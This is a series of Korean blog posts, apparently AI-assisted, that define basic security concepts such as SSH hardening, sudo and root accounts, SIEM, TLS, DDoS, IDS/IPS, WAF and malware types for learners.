비밀번호 복잡도 강화

3️⃣ root 직접 로그인 금지

/etc/ssh/sshd_config에서 PermitRootLogin no 설정
sudo 권한 사용 권장

4️⃣ 접근 제어(IP 제한)

특정 IP만 접속 허용 (방화벽/hosts.allow 사용)

5️⃣ 로그 모니터링 및 경보

/var/log/auth.log 등에서 로그인 시도 기록 확인
실패 횟수 초과 시 차단(예: Fail2ban 사용)

6️⃣ SSH 프로토콜 최신 버전 사용

SSH-2 권장 (SSH-1 취약)

7️⃣ Idle Timeout 설정

사용하지 않는 세션 자동 종료

4. SSH 공격 예시

공격 유형설명

Brute Force	무작위 비밀번호 대입 공격
Credential Stuffing	탈취한 계정/비밀번호 반복 로그인 시도
Man-in-the-Middle	키 인증 미검증 시 통신 가로채기
Port Scanning	기본 포트 스캐닝 후 공격 시도

한 문장 요약

SSH 보안 = 원격 서버 접속 시 안전한 암호화 통신을 유지하고, 접근 제어·인증 강화·로그 모니터링 등을 통해 시스템을 보호하는 보안 관리 활동

[보안_GPT] sudo 권한이란?

isaacToast — Fri, 14 Nov 2025 14:28:23 +0900

1. sudo 권한이란?

정의:
sudo(Superuser DO) 권한은 일반 사용자 계정이 일시적으로 root(최고 관리자) 권한을 사용하여 시스템 명령을 실행할 수 있는 권한을 말해.

즉:

“root 계정 없이도 제한된 시간/명령에 한해 최고 권한 명령을 수행할 수 있게 해주는 권한”

리눅스/유닉스 시스템에서 주로 사용
보안 강화 + 관리 편의성을 동시에 제공

2. sudo 권한 특징

특징설명

일시적 권한 상승	필요한 명령만 root 권한으로 실행 가능
로그 기록	누가 어떤 명령을 실행했는지 기록 → 추적 가능
접근 제어	/etc/sudoers 파일에서 사용자별 권한 설정
보안 강화	root 직접 로그인 제한, 최소 권한 원칙 적용 가능

3. sudo 사용 예시

# 시스템 업데이트 (root 권한 필요) sudo apt update # 패키지 설치 sudo apt install nginx # 파일 소유자 변경 sudo chown user:user /var/www/html

sudo 명령어 입력 후 사용자 비밀번호 인증 필요
/etc/sudoers 파일에서 명령어/사용자별 권한 제어 가능

4. sudo와 root 계정 비교

구분root 계정sudo 권한

로그인	직접 로그인 가능	일반 사용자 로그인 후 명령 실행
권한 범위	전체 시스템	지정 명령만 가능 (설정 가능)
보안	위험 (실수 시 시스템 전체 영향)	제한적, 추적 가능
로그 기록	제한적	명령 실행 시 모두 기록

5. sudo 권한 장점

root 직접 로그인 제한 → 보안 강화
최소 권한 원칙 적용 가능
사용자별 권한 세밀하게 관리 가능
명령 실행 기록 → 감사(Audit) 가능

한 문장 요약

sudo 권한 = 일반 사용자가 필요할 때 일시적으로 root 권한으로 명령을 실행할 수 있게 해주는 권한으로, 보안을 강화하면서 관리 편의성을 제공한다.

[보안_GPT] root 계정이란?

isaacToast — Fri, 14 Nov 2025 14:27:19 +0900

1. root 계정이란?

정의:
root 계정은 리눅스(Linux)나 유닉스(Unix) 계열 운영체제에서 모든 권한을 가진 최고 관리자 계정이야.

즉:

“시스템 전체를 제어할 수 있는 최상위 관리자 계정”

모든 파일, 디렉터리, 프로세스, 사용자 계정을 관리 가능
시스템 설정 변경, 소프트웨어 설치/삭제, 보안 설정 조정 가능

2. root 계정 특징

특징설명

권한 수준	시스템 전체 권한, 모든 명령 수행 가능
접근 제한 필요	실수나 악성 코드에 의한 피해 가능 → 사용 제한 권장
패스워드 보호 필수	안전한 비밀번호 설정 필수
sudo 사용 가능	일반 계정이 필요 시 root 권한 명령 수행 가능

3. root 계정 사용 사례

1️⃣ 시스템 설치/업데이트

OS 설치, 패키지 관리, 보안 업데이트

2️⃣ 사용자/그룹 관리

계정 생성, 삭제, 권한 변경

3️⃣ 시스템 설정 변경

방화벽 설정, 네트워크 구성, 서비스 시작/중지

4️⃣ 보안/백업 관리

로그 접근, 백업, 복원, 접근 제어

4. root 계정 보안 관리

root 직접 로그인 제한 → 일반 사용자 계정 + sudo 사용
강력한 비밀번호 설정 + 주기적 변경
SSH 접속 시 키 인증 사용
중요 명령 실행 시 로그 기록 및 모니터링

한 문장 요약

root 계정 = 리눅스/유닉스 시스템에서 모든 권한을 가진 최고 관리자 계정으로, 시스템 설정과 사용자 관리를 포함한 모든 작업이 가능하며, 보안상 신중하게 사용해야 한다.

[보안_GPT] ISMS-P란?

isaacToast — Fri, 14 Nov 2025 14:22:56 +0900

1. ISMS-P란?

정의:
**ISMS-P(Information Security Management System & Personal Information Protection)**는

“기업이나 기관이 정보보호 관리체계(ISMS)와 개인정보 보호 관리체계를 통합하여 운영하도록 인증하는 제도”

를 말해.

즉:

“정보보호 + 개인정보 보호를 한 번에 관리하고 인증받는 제도”

국내에서 한국인터넷진흥원(KISA)에서 인증 관리
정보보호 관리체계(ISMS) 인증 + 개인정보보호 관리체계(PIMS/PIPL) 인증을 통합

2. ISMS-P 목적

1️⃣ 정보보호 체계 강화

기업 내 중요 정보, 시스템, 데이터 보호

2️⃣ 개인정보 보호 준수

개인정보 처리 관련 법규 준수

3️⃣ 신뢰성 확보

고객, 거래처, 금융기관 등에게 보안 신뢰성 증명

4️⃣ 리스크 관리

보안 위협, 사고 예방 및 대응 체계 마련

3. ISMS-P 인증 범위

구분설명

ISMS	조직의 정보보호 관리체계, 보안 정책, 기술적·관리적 통제
P (Privacy)	개인정보 보호 관련 정책, 절차, 기술적·관리적 통제

즉, ISMS-P = ISMS + 개인정보보호 관리체계 통합 인증

4. 인증 절차

1️⃣ 예비 점검

현황 평가, 개선 사항 확인

2️⃣ 신청 및 문서 심사

보안 정책, 절차, 기술적 통제 문서 제출

3️⃣ 현장 심사

실제 시스템·보안 환경 점검

4️⃣ 인증서 발급

기준 충족 시 ISMS-P 인증서 발급

5️⃣ 사후 관리

정기 심사, 개선 사항 반영

5. ISMS-P 장점

법규 및 규제 준수
기업 정보보호 수준 향상
고객/거래처 신뢰 확보
보안사고 예방 및 대응 체계 강화
금융권, 공공기관 거래 시 필수 인증으로 인정

한 문장 요약

ISMS-P = 기업의 정보보호 관리체계(ISMS)와 개인정보 보호 관리체계를 통합해 인증받는 제도로, 정보보호와 개인정보 보호를 동시에 강화하고 신뢰성을 증명한다.

[보안_GPT] 방화벽이란?

isaacToast — Fri, 14 Nov 2025 14:22:09 +0900

1. 방화벽이란?

정의:
방화벽은 네트워크 경계에서 들어오고 나가는 트래픽을 검사하고, 설정된 보안 정책에 따라 허용 또는 차단하는 보안 장치야.

즉:

“내부망과 외부망 사이의 문지기 역할을 하며, 공격이나 불법 접근을 막는 네트워크 보안 장치”

기업, 기관, 개인 네트워크 어디서나 필수
네트워크 보안의 기본 장치

2. 방화벽 종류

종류특징장점

패킷 필터링(Packet Filtering)	IP, 포트, 프로토콜 기준으로 허용/차단	속도 빠름, 간단
상태 기반(Stateful Firewall)	세션 상태 추적 → 비정상 패킷 차단	보안 강화, TCP 연결 상태 확인 가능
프록시(Proxy Firewall)	애플리케이션 계층에서 요청 중계	웹/애플리케이션 공격 차단 가능
차세대 방화벽(NGFW)	IPS, 앱 제어, 사용자 인증 통합	복합 위협 대응, 상세 정책 가능
클라우드 방화벽(CFW / Cloud Firewall)	클라우드 환경 보호	클라우드 네트워크 트래픽 필터링

3. 방화벽 동작 원리

1️⃣ 트래픽 검사

출발지 IP, 목적지 IP, 포트, 프로토콜 확인

2️⃣ 보안 정책 적용

허용/차단 룰 기반 트래픽 필터링

3️⃣ 로그 기록 및 알람

차단 패킷 기록 → 보안관제(SIEM) 연동 가능

4️⃣ 고급 기능 (NGFW)

애플리케이션 인식
침입 탐지/방지(IPS)
URL 필터링, 사용자 인증

4. 방화벽 활용 사례

외부 인터넷으로부터 내부망 보호
내부 직원의 불법 웹 접근 차단
서버별 접근 제어 (DB, 웹 서버)
원격지 VPN 접속 허용/차단

5. 장점

외부 공격 차단 → 네트워크 보호
정책 기반 접근 제어 가능
로그 기록 → 보안관제 활용
NGFW는 내부 위협까지 대응 가능

한 문장 요약

방화벽 = 네트워크 경계에서 들어오고 나가는 트래픽을 정책 기반으로 검사·허용·차단하여 내부망을 보호하는 핵심 보안 장치

[보안_GPT] C&C 트래픽이란?

isaacToast — Fri, 14 Nov 2025 14:21:17 +0900

1. C&C 트래픽이란?

정의:
C&C 트래픽은 악성코드에 감염된 장치(좀비, Bot)가 공격자의 명령 서버(Command & Control Server)와 주고받는 네트워크 트래픽을 말해.

즉:

“봇넷 악성코드가 공격자의 지시를 받고 데이터를 보내거나 명령을 받는 통신”

기업 내부망에서 발생하면 보안 사고의 주요 신호
보안관제(SIEM)에서 탐지해야 하는 대표적 악성 트래픽

2. C&C 트래픽 특징

1️⃣ 주기적 통신

일정 시간마다 서버와 통신 → 감염 장치 동기화

2️⃣ 암호화/은폐

통신 내용 암호화 또는 정상 트래픽처럼 위장

3️⃣ 비정상 도메인/IP 접속

내부 시스템에서는 접근하지 않는 외부 IP/도메인으로 통신

4️⃣ 명령 수신 및 데이터 송신

공격 명령 실행 (DDoS, 정보 탈취 등)
내부 정보 ex) 계정, 파일, 키보드 입력 전송

3. C&C 트래픽 예시

유형설명

HTTP/HTTPS 기반	웹 요청처럼 위장, 정상 트래픽과 유사
DNS 기반	도메인 이름 요청을 통해 명령 수신
IRC 기반	채팅 서버를 통해 명령 전달
P2P 기반	중앙 서버 없이 Bot끼리 명령 전달

4. C&C 트래픽 탐지 방법

비정상 외부 IP 접속 모니터링
내부 장치의 주기적 트래픽 패턴 분석
DNS 요청 이상 패턴 탐지
SIEM / EDR 연동 → 이상행위 경보

5. 대응 방법

1️⃣ 감염 장치 격리
2️⃣ 악성코드 제거 및 복구
3️⃣ 방화벽, IPS, WAF 룰 업데이트
4️⃣ C&C 서버 차단
5️⃣ 네트워크 트래픽 지속 모니터링

한 문장 요약

C&C 트래픽 = 악성코드에 감염된 장치가 공격자의 명령 서버와 주고받는 통신으로, 명령 수신과 내부 정보 유출을 수행하며, 탐지와 차단이 보안 대응의 핵심이다.

[GPT_보안] SSL 인증서란?

isaacToast — Fri, 14 Nov 2025 14:20:35 +0900

1. SSL 인증서란?

정의:
SSL 인증서는 웹사이트와 사용자의 브라우저 간 안전한 통신을 위해 공개키 기반 암호화(PKI)를 사용하여 발급되는 디지털 인증서야.

즉:

“이 사이트가 신뢰할 수 있는 사이트임을 확인하고, 데이터 전송 시 암호화를 제공하는 디지털 신분증”

HTTPS 접속 시 주소창 자물쇠 표시의 근거
TLS 통신에서 서버 인증 및 암호화에 사용됨

2. SSL 인증서 핵심 기능

1️⃣ 서버 인증(Server Authentication)

브라우저가 접속한 웹사이트가 진짜인지 확인
위조/피싱 사이트 방지

2️⃣ 데이터 암호화(Data Encryption)

브라우저 ↔ 서버 간 전송 데이터 암호화
도청·스니핑 방지

3️⃣ 데이터 무결성(Data Integrity)

전송 중 데이터 변조 여부 확인
Hash, MAC 사용

3. SSL 인증서 구성 요소

구성 요소설명

공개키(Public Key)	암호화에 사용, 누구나 확인 가능
개인키(Private Key)	서버에만 존재, 복호화에 사용
인증서 정보	도메인, 발급자(CA), 유효기간 등
디지털 서명	인증서 발급자가 서명 → 신뢰성 보장

4. SSL 인증서 종류

1️⃣ 도메인 인증(Domain Validation, DV)

도메인 소유권 확인만 → 빠르고 저렴

2️⃣ 조직 인증(Organization Validation, OV)

도메인 + 조직 정보 확인 → 신뢰도 높음

3️⃣ 확장 인증(Extended Validation, EV)

엄격한 기업 인증 → 브라우저 주소창 녹색 자물쇠, 회사명 표시

4️⃣ 와일드카드 인증서

하나의 도메인 + 모든 서브도메인 보호
예: *.example.com

5️⃣ 멀티 도메인 인증서(SAN/UCC)

여러 도메인 동시 보호

5. SSL 인증서 발급 과정

1️⃣ 서버 → 인증기관(CA)에 인증서 신청
2️⃣ CA → 도메인 소유권 및 기업 정보 확인
3️⃣ CA → 서버에 SSL 인증서 발급
4️⃣ 서버 → 브라우저에 인증서 제공, TLS Handshake 수행

한 문장 요약

SSL 인증서 = 웹사이트의 신뢰성을 검증하고, 브라우저와 서버 간 데이터 전송을 암호화·보호하는 디지털 인증서

[보안_GPT] Syslog란?

isaacToast — Fri, 14 Nov 2025 14:19:45 +0900

1. Syslog란?

정의:
Syslog는 시스템, 장치, 애플리케이션에서 발생한 로그 메시지를 표준 형식으로 수집하고 전송하는 프로토콜이야.

즉:

“서버, 네트워크 장치, 보안 장비에서 발생한 로그를 한 곳으로 모으고, 관리자가 쉽게 확인할 수 있도록 해주는 표준 방법”

네트워크 장치(Cisco, Juniper), 서버(Linux, Windows), 보안 장비(Firewall, IPS, WAF) 등에서 사용
보안관제(SIEM) 연계에 필수적

2. Syslog 구성 요소

1️⃣ Syslog 메시지(Message)

로그의 실제 내용
구조: <Priority> Timestamp Hostname Tag Message
- 예: <34> Nov 14 13:30 server1 sshd[1234]: Accepted password for user

2️⃣ Syslog 서버(Syslog Server / Collector)

로그 수집, 저장, 분류
중앙 관리 및 분석용

3️⃣ Syslog 클라이언트(Syslog Client / Agent)

로그를 생성하고 Syslog 서버로 전송
장치 자체 또는 에이전트 소프트웨어

3. Syslog 메시지 형식

1️⃣ Priority (PRI)

로그의 중요도와 시설(Facility) 정보 포함
중요도(Level): Emergency(0) ~ Debug(7)

2️⃣ Header

Timestamp, Hostname

3️⃣ Message

Tag(프로세스 이름) + 실제 로그 내용

4. Syslog 전송 방식

1️⃣ UDP (기본, 514 포트)

가볍지만 신뢰성 낮음, 패킷 손실 가능

2️⃣ TCP

연결 기반, 신뢰성 높음

3️⃣ TLS 적용 가능

암호화 전송 → 보안 강화

5. Syslog 활용 사례

보안관제(SIEM 연동): 방화벽, IPS, WAF 로그 수집
시스템 모니터링: 서버 이벤트, 에러 로그 관리
규제 준수: 감사용 로그 저장
네트워크 트러블슈팅: 장애 원인 분석

한 문장 요약

Syslog = 서버, 네트워크 장치, 애플리케이션에서 발생한 로그를 표준 형식으로 수집·전송하여 중앙에서 관리하고 분석할 수 있도록 하는 프로토콜

[보안_GPT] ESM이란?

isaacToast — Fri, 14 Nov 2025 14:19:05 +0900

1. ESM이란?

정의:
ESM은 기업 내 보안 장치와 시스템에서 발생하는 정보를 통합 관리하고, 보안 정책 준수와 위협 대응을 지원하는 통합 보안 관리 플랫폼을 의미해.

즉:

“기업 전체 보안 상황을 한눈에 관리하고, 위험을 분석·대응할 수 있도록 지원하는 통합 관리 체계”

SIEM이 로그·이벤트 분석 중심이라면
ESM은 조직 전체 보안 관리와 정책 중심에 초점을 둠
SIEM, IAM, DLP, 방화벽, IPS 등 다양한 보안 솔루션과 연계 가능

2. ESM 주요 기능

1️⃣ 보안 정책 관리

기업 보안 규정, 접근 정책, 사용자 권한 관리
규제 준수 지원(ISO 27001, GDPR 등)

2️⃣ 위협 통합 모니터링

SIEM, IDS/IPS, WAF, 방화벽 로그 통합
전사적 보안 현황 대시보드 제공

3️⃣ 위험 분석 및 평가(Risk Assessment)

자산, 취약점, 위협 이벤트를 통합 분석
우선순위 기반 대응 지원

4️⃣ 사고 대응 및 워크플로우 관리

보안 사고 발생 시 대응 절차 자동화
관련 팀 알림 및 처리 기록 관리

5️⃣ 보고 및 컴플라이언스 지원

주기적 리포트, 감사용 자료 생성
규제 준수 여부 확인 가능

3. SIEM과 ESM 차이

구분SIEMESM

중심	로그·이벤트 수집 및 분석	조직 전체 보안 정책·위험 관리
목적	실시간 위협 탐지	보안 운영, 정책 준수, 리스크 관리
연계	주로 로그 기반	SIEM, 방화벽, IAM 등 통합

쉽게 말하면 SIEM이 ‘경보’ 중심이라면
ESM은 ‘전사적 보안 관리’ 중심이라고 이해하면 돼

4. ESM 장점

기업 전반 보안 가시성 확보
위협 대응 효율성 향상
규제·컴플라이언스 준수 용이
다양한 보안 솔루션 연계 가능
보안 운영 자동화 지원

한 문장 요약

ESM = 기업 전체의 보안 장치와 시스템을 통합 관리하고, 보안 정책 준수와 위협 대응을 지원하는 전사적 보안 관리 플랫폼

[보안_GPT] SIEM이란?

isaacToast — Fri, 14 Nov 2025 14:18:09 +0900

1. SIEM이란?

정의:
SIEM은 기업의 IT 시스템과 네트워크에서 발생하는 보안 이벤트와 로그를 수집, 분석, 저장하여 보안 위협을 탐지·관리하는 시스템이야.

즉:

“모든 시스템 로그와 이벤트를 한 곳에서 모아 이상 징후를 분석하고, 보안관제팀이 빠르게 대응할 수 있도록 돕는 플랫폼”

SOC(Security Operation Center) 핵심 도구
실시간 모니터링 + 장기 로그 분석 가능

2. SIEM 주요 기능

1️⃣ 로그 수집(Log Collection)

방화벽, IDS/IPS, WAF, 서버, DB 등 다양한 장치 로그 수집

2️⃣ 이벤트 상관분석(Event Correlation)

서로 관련된 이벤트를 연결하여 공격 패턴 탐지
예: 여러 시스템에서 동시 로그인 실패 → 계정 공격 의심

3️⃣ 실시간 경보(Alerting)

이상 징후 발생 시 SOC 담당자에게 알람 발송

4️⃣ 보관 및 감사(Audit & Compliance)

법규, 규정 준수를 위한 로그 저장
사고 발생 시 분석 근거 제공

5️⃣ 대시보드 & 리포팅

보안 현황 시각화
주기적 보안 리포트 생성

3. SIEM 활용 사례

계정 탈취 시도 탐지: 비정상 로그인 패턴 분석
내부자 위협 탐지: 권한 이상 사용, 민감 데이터 접근 모니터링
DDoS / 공격 징후 탐지: 네트워크 이벤트 상관분석
규제 준수: GDPR, ISO 27001, 금융권 감사 대비

4. SIEM 구성 요소

구성 요소설명

로그 수집기(Collector)	다양한 장치/서버 로그 수집
로그 저장소(Storage)	장기 보관, 검색 가능
분석 엔진(Analyzer)	이벤트 상관분석, 패턴 탐지
알람 & 보고(Alert & Reporting)	이상 이벤트 알림, 리포트 생성
대시보드(Dashboard)	시각화 및 보안 현황 모니터링

5. SIEM 장점

중앙 집중식 보안 모니터링
보안 위협 탐지 속도 향상
사고 대응 시간 단축
규제/컴플라이언스 대응 용이
보안관제 자동화 가능

한 문장 요약

SIEM = 기업 내 모든 시스템과 네트워크에서 발생하는 로그와 이벤트를 수집·분석하여 보안 위협을 탐지하고 대응을 지원하는 보안 관리 플랫폼

[보안_GPT] TLS란?

isaacToast — Fri, 14 Nov 2025 14:17:30 +0900

1. TLS란?

정의:
TLS는 인터넷에서 데이터 전송 시 기밀성·무결성·인증을 제공하는 보안 프로토콜이야.

즉:

“웹 브라우저와 서버 간 데이터를 안전하게 암호화해서 주고받도록 하는 기술”

이전에는 SSL(Secure Sockets Layer)이라고 불렸음 → 현재는 TLS로 대체
HTTPS, 이메일, VPN 등 다양한 통신에서 사용

2. TLS 핵심 기능

1️⃣ 데이터 암호화(Confidentiality)

전송되는 데이터를 암호화 → 외부에서 내용을 볼 수 없음

2️⃣ 데이터 무결성(Integrity)

전송 중 데이터 변조 여부 확인
해시, MAC(Message Authentication Code) 사용

3️⃣ 인증(Authentication)

서버 인증, 필요 시 클라이언트 인증
인증서(X.509) 기반 → 신뢰할 수 있는 서버인지 확인

3. TLS 동작 과정 (Handshake)

1️⃣ 클라이언트 Hello

클라이언트가 지원하는 TLS 버전, 암호화 알고리즘, 랜덤 값 전송

2️⃣ 서버 Hello

서버가 암호화 방식 선택, 인증서 전송

3️⃣ 인증 및 키 교환

서버 인증서 확인
세션 키(Session Key) 생성 → 대칭키 암호화용

4️⃣ 암호화 통신 시작

세션 키로 데이터 암호화 후 안전하게 전송

4. TLS 사용 사례

HTTPS 웹사이트
- 브라우저와 서버 간 안전한 웹 트래픽
이메일 전송(SMTPS, IMAPS, POP3S)
VPN 연결
API 통신

5. TLS 장점

통신 내용 노출 방지 → 스니핑 예방
중간자 공격(MITM) 방지
데이터 변조 감지 → 무결성 보장
서버 인증 → 피싱/위조 사이트 방지

6. TLS 버전

버전특징

SSL 2.0/3.0	오래된 버전, 취약점 존재, 사용 금지
TLS 1.0 / 1.1	취약점 존재, 현대 환경에서는 사용 안 함
TLS 1.2	대다수 서버/클라이언트 지원, 안전
TLS 1.3	최신 표준, 성능 개선 + 보안 강화, 비대칭키 핸드쉐이크 단축

한 문장 요약

TLS = 인터넷에서 데이터를 안전하게 전송하기 위해 암호화·무결성·인증을 제공하는 보안 프로토콜로, HTTPS와 VPN 등에서 사용된다.

[보안_GPT] DDoS란?

isaacToast — Fri, 14 Nov 2025 14:16:46 +0900

1. DDoS란?

정의:
DDoS는 여러 대의 공격자가 동시에 특정 서버, 서비스, 네트워크에 대량 트래픽을 보내 정상적인 서비스 제공을 방해하는 공격이야.

즉:

“많은 컴퓨터를 동원해 서버를 과부하 시켜, 정상 사용자가 서비스를 이용하지 못하게 만드는 공격”

단순 DoS(서비스 거부 공격)와 달리 여러 위치에서 동시 공격
기업, 금융, 쇼핑몰, 게임 서버 등 인터넷 서비스가 중요한 곳에서 주요 위협

2. DDoS vs DoS

구분DoSDDoS

공격자	1대 컴퓨터	여러 대 컴퓨터(봇넷)
트래픽 규모	상대적으로 작음	매우 큼, 글로벌 공격 가능
탐지	상대적으로 쉬움	탐지 어려움, IP 분산
피해	제한적	심각한 서비스 중단

3. DDoS 공격 방식

1️⃣ 트래픽 과부하 공격 (Volumetric Attack)

대량 패킷으로 네트워크 용량 소모
예: UDP Flood, ICMP Flood, DNS Amplification

2️⃣ 서비스 자원 고갈 공격 (Resource Exhaustion Attack)

서버 CPU, 메모리, 연결 수 고갈
예: HTTP GET Flood, Slowloris

3️⃣ 프로토콜 공격 (Protocol Attack)

TCP/IP 프로토콜 취약점 악용
예: SYN Flood, Ping of Death

4. 공격 발생 원인

정치적/사회적 목적(해킹 단체, 해커 그룹)
경쟁사 공격
금전적 목적(랜섬 DDoS, 협박)
봇넷 악용(악성코드 감염 컴퓨터 대량 동원)

5. DDoS 피해

웹사이트/서비스 다운 → 매출 손실
서버/네트워크 과부하 → 장비 손상 가능
고객 신뢰도 하락
보안 대응 비용 증가

6. DDoS 방어 방법

1️⃣ 방화벽 / IPS / WAF 적용

공격 패턴 차단, 비정상 트래픽 필터링

2️⃣ 트래픽 필터링 / Rate Limiting

초당 요청 수 제한, 비정상 IP 차단

3️⃣ CDN / 클라우드 DDoS 방어 서비스

Akamai, Cloudflare, AWS Shield 등
글로벌 분산 서버로 트래픽 흡수

4️⃣ 네트워크 분산 / 스케일링

서버 부하 분산 → 서비스 지속

5️⃣ 모니터링 및 알람

비정상 트래픽 즉시 탐지 → 대응

한 문장 요약

DDoS = 여러 컴퓨터에서 동시에 대량 트래픽을 보내 서버나 서비스를 마비시키는 공격으로, 방화벽, IPS, WAF, CDN, 트래픽 모니터링 등으로 방어해야 한다.

[보안_GPT] IDS란?

isaacToast — Fri, 14 Nov 2025 14:16:07 +0900

1. IDS란?

정의:
IDS는 네트워크나 시스템에서 발생하는 트래픽과 이벤트를 분석해 침입이나 공격 시도를 탐지하는 장치 또는 소프트웨어야.

즉:

“실시간으로 공격을 탐지하지만, 스스로 차단하지는 않는 보안 장치”

IDS는 알람/로그를 통해 보안 담당자에게 공격을 알려주는 감시자 역할
IPS와 비교하면 자동 차단 기능 없음

2. IDS vs IPS 비교

구분IDSIPS

역할	공격 탐지 및 알람	공격 탐지 + 자동 차단
트래픽 위치	패킷 미러링 방식	트래픽 경로 상에서 실시간 검사
대응	수동 대응 필요	자동 차단 가능
목적	모니터링 & 분석	예방 및 차단

3. IDS 동작 방식

1️⃣ 트래픽 모니터링

네트워크 패킷, 호스트 이벤트, 로그 분석

2️⃣ 공격 탐지 방식

시그니처 기반(Signature-based): 알려진 공격 패턴 탐지
이상행위 기반(Anomaly-based): 정상 트래픽과 다른 행동 감지
상태 기반(Stateful Protocol Analysis): 프로토콜 비정상 여부 확인

3️⃣ 알람 생성

침입 의심 이벤트 → 관리자 알람, SIEM 연동 가능

4️⃣ 로그 기록

공격 패턴, 발생 시간, 출발지/목적지 IP 등 기록

4. IDS 종류

1️⃣ NIDS (Network IDS)

네트워크 전체 트래픽 분석
스위치/라우터 미러 포트 통해 감시

2️⃣ HIDS (Host IDS)

서버, PC 등 개별 호스트에서 이벤트 분석
파일 변조, 로그인 시도, 시스템 호출 감시

3️⃣ Wireless IDS (WIDS)

무선 네트워크 트래픽 분석, AP 감시

5. IDS가 탐지할 수 있는 공격

DDoS / DoS 공격 시도
포트 스캔, 취약점 공격 시도
SQL Injection, XSS 등 웹 공격
악성코드 침투 시도
내부 사용자 권한 남용

6. IDS 장점

네트워크 및 시스템 가시성 확보
보안관제 연계 → SIEM 로그 분석 가능
알려진 공격뿐만 아니라 이상행위 탐지 가능
IPS보다 오탐(차단 오류) 위험 낮음

한 문장 요약

IDS = 네트워크나 시스템에서 발생하는 침입이나 공격 시도를 실시간으로 탐지하고 알람과 로그를 생성하는 장치로, 스스로 차단하지는 않는 감시자 역할을 한다.

[보안_GPT] IPS란?

isaacToast — Fri, 14 Nov 2025 14:15:30 +0900

1. IPS란?

정의:
IPS는 네트워크나 시스템에 들어오는 악성 트래픽이나 공격 시도를 실시간으로 탐지하고 차단하는 보안 장치야.

즉:

“침입을 사전에 막는 보안 장치로, 공격 트래픽을 감지하고 자동으로 차단까지 수행”

IDS(Intrusion Detection System)와 달리 탐지 + 차단 기능 포함
네트워크와 서버를 보호하는 사전 방어 수단

2. IPS vs IDS 비교

구분IDSIPS

역할	공격 탐지 및 알람	공격 탐지 + 차단
위치	네트워크 패킷 미러링	트래픽 라인 상에서 실시간 검사
대응	수동 대응	자동 차단 가능
예시	SIEM 연동 알람	방화벽과 연동해 트래픽 차단

3. IPS 동작 방식

1️⃣ 트래픽 모니터링

패킷, 세션, 프로토콜 분석

2️⃣ 공격 탐지

시그니처 기반: 이미 알려진 공격 패턴 탐지
이상행위 기반(Anomaly-based): 정상 트래픽과 다른 패턴 탐지
상태 기반(Stateful): 연결 상태 및 프로토콜 비정상 탐지

3️⃣ 자동 차단/격리

공격 트래픽 DROP
세션 종료, IP 차단, 관리자 알람

4️⃣ 로그 기록 및 보안관제 연동

SIEM/보안관제와 연계해 추후 분석

4. IPS가 보호하는 공격 유형

DDoS / DoS 공격
포트 스캐닝, 취약점 공격
SQL Injection, XSS 등 웹 공격
악성코드/봇넷 트래픽
ARP 스푸핑, 패킷 변조 등 내부 공격

5. IPS 장점

실시간 공격 차단 → 피해 최소화
알려진 공격과 Zero-day 공격 일부 대응
네트워크 가시성 확보 → 보안 관제 강화
IDS 대비 자동 대응 가능

6. IPS 설치 위치

네트워크 라인 기반: 스위치/라우터 앞단, 트래픽 통과 시 검사
호스트 기반(HIPS): 서버 내 설치, OS·애플리케이션 레벨 보호

한 문장 요약

IPS = 네트워크나 시스템으로 들어오는 공격 트래픽을 실시간으로 탐지하고 자동으로 차단하여 사전 침입 방어를 수행하는 보안 장치

[보안_GPT] WAF란?

isaacToast — Fri, 14 Nov 2025 14:14:33 +0900

1. WAF란?

정의:
WAF는 웹 애플리케이션을 대상으로 한 공격을 탐지·차단하는 보안 장치야.

즉:

“웹 서버 앞단에서 들어오는 HTTP/HTTPS 요청을 검사해 공격성 트래픽을 차단하는 방화벽”

일반 방화벽(Firewall)은 네트워크 레벨(L3/L4)을 보호
WAF는 웹 애플리케이션 레벨(L7) 공격을 보호

2. WAF가 보호하는 공격 유형

공격 유형설명

SQL Injection	데이터베이스 조작 시도
XSS(Cross-Site Scripting)	스크립트 삽입 공격
CSRF	사용자를 속여 요청 강제 실행
파일 업로드 취약점	악성 파일 업로드 차단
Command Injection	서버 명령 실행 공격
Directory Traversal	파일 경로 접근 공격
Bot 공격 / 크롤링	과도한 요청, 계정 탈취 시도

3. WAF 동작 방식

1️⃣ 요청 검사

HTTP 요청 헤더, URL, 쿠키, 파라미터 검사

2️⃣ 정책 적용

화이트리스트/블랙리스트
시그니처 기반, 패턴 분석

3️⃣ 차단/허용 결정

공격성 요청 → 차단/로그 기록
정상 요청 → 웹 서버 전달

4️⃣ 로그/알람

공격 탐지 시 보안관제 연동 가능

4. WAF 적용 방식

1️⃣ 네트워크형(Wireless/Reverse Proxy)

웹 서버 앞단에서 모든 트래픽 필터링
SSL 종료 가능

2️⃣ 호스트형(HOST-BASED WAF)

웹 서버 내부 소프트웨어 형태
애플리케이션 내부 로직 보호

3️⃣ 클라우드형(Cloud WAF)

CDN 또는 클라우드에서 서비스 형태 제공
구축 비용 절감, 빠른 배포 가능

5. WAF 장점

웹 애플리케이션 공격 방어
Zero-day 공격 완화 가능
DDoS, Bot 공격 완화
로그 기반 보안관제 연동 가능
정책 기반 운영 → 취약점 패치 전 임시 방어

한 문장 요약

WAF = 웹 애플리케이션을 대상으로 한 공격을 HTTP/HTTPS 수준에서 탐지·차단하는 방화벽으로, SQL Injection, XSS, CSRF 등 다양한 웹 공격으로부터 서버를 보호한다.

[보안_GPT] 악성코드란?

isaacToast — Fri, 14 Nov 2025 14:13:45 +0900

1. 악성코드란?

정의:
악성코드는 컴퓨터나 네트워크에 피해를 주기 위해 작성된 악의적 소프트웨어를 말해.

즉:

“사용자의 동의 없이 시스템을 감염시키고, 정보를 탈취하거나 기능을 손상시키는 프로그램”

Malware = Malicious + Software
종류와 공격 방식이 다양해서 보안에서 가장 기본적·중요한 위협 중 하나

2. 악성코드의 주요 유형

유형설명예시

바이러스(Virus)	파일에 기생해 실행될 때 전파	실행파일 감염
웜(Worm)	스스로 네트워크 통해 전파	이메일 첨부, SMB 웜
트로이목마(Trojan)	정상 프로그램처럼 위장, 내부 공격	원격제어, 백도어
랜섬웨어(Ransomware)	파일/시스템 암호화 후 금전 요구	WannaCry, Locky
스파이웨어(Spyware)	사용자 정보 몰래 수집	키로거, 브라우저 히스토리 수집
애드웨어(Adware)	광고를 강제로 표시	팝업 광고 프로그램
루트킷(Rootkit)	시스템 핵심에 숨으며 권한 탈취	커널 레벨 은닉
봇(Bot)	원격제어를 위해 감염	DDoS 공격용 봇넷
키로거(Keylogger)	키보드 입력 기록	로그인 정보 탈취

3. 악성코드 감염 경로

1️⃣ 이메일 첨부파일
2️⃣ 악성 웹사이트 / 피싱 사이트
